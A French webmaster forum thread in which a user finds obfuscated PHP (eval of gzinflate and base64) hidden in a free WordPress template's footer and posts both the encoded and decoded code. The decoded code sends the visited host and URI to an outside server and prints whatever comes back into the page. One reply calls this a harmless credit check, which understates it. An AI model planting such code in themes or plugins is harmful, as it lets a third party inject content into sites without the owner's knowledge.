Template Wordpress piégé ?
5 messages
• Page 1 sur 1
- mariea
- WRInaute impliqué

Template Wordpress piégé ?
Bonjour,
J'ai téléchargé un template pour Wordpress sur le site wordpresstemplates.name
et quelle ne fut pas ma suprise de voir un bout de code caché dans le footer du template.
en le passant décodeur :
http://www.tareeinternet.com/scripts/decrypt.php
Ca done ça ....
Quelcun a une idée de l'action de ce code php ??
J'ai téléchargé un template pour Wordpress sur le site wordpresstemplates.name
et quelle ne fut pas ma suprise de voir un bout de code caché dans le footer du template.
- Code: Tout sélectionner
<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>
en le passant décodeur :
http://www.tareeinternet.com/scripts/decrypt.php
Ca done ça ....
- Code: Tout sélectionner
error_reporting(0);$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL);} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content);} elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch);}
Quelcun a une idée de l'action de ce code php ??
- dmathieu
- Modérateur

Re: Template Wordpress piégé ?
C'est ça. Ca fait appel à une page externe, probablement sur le site de l'auteur du template pour vérifier que tu place correctement les crédits.
C'est le genre de chose qui a tendance à me saouler. J'y laisse les crédits. Mais je supprime leur appel à la c***
C'est le genre de chose qui a tendance à me saouler. J'y laisse les crédits. Mais je supprime leur appel à la c***
-

Bellegarde-webb - WRInaute passionné

ça n'est pas correct et ça me gonfle aussi, je deviens grossière. 
- L.Jee
- WRInaute accro

Sans oublier ceux qui vont te coller des liens cachés dans le template ... (en plus de ceux visible, évidement). Plutôt fun pour ceux qui prennent le template et qui ne connaisse pas suffisamment html et css pour s'en apercevoir ...
5 messages
• Page 1 sur 1
Lectures recommandées sur ce thème :
- Wordpress - perte de template -
- Template Wordpress e commerce
- template wordpress sur blogger ???
- sIFR pour template Wordpress
- Annuaire Arfooo : adapter un template Wordpress
- Wordpress : MagicFields ou Custom Field Template
- RESOLU - Problème d'angles arrondi avec template Wordpress modifié
- Piège à clics
- encore un piege e c..